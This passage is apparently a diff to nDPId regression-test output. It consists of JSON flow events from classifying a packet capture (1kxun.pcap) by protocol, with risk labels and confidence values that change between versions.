Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1470104380909,"flow_last_seen":1470104420950,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":1585,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 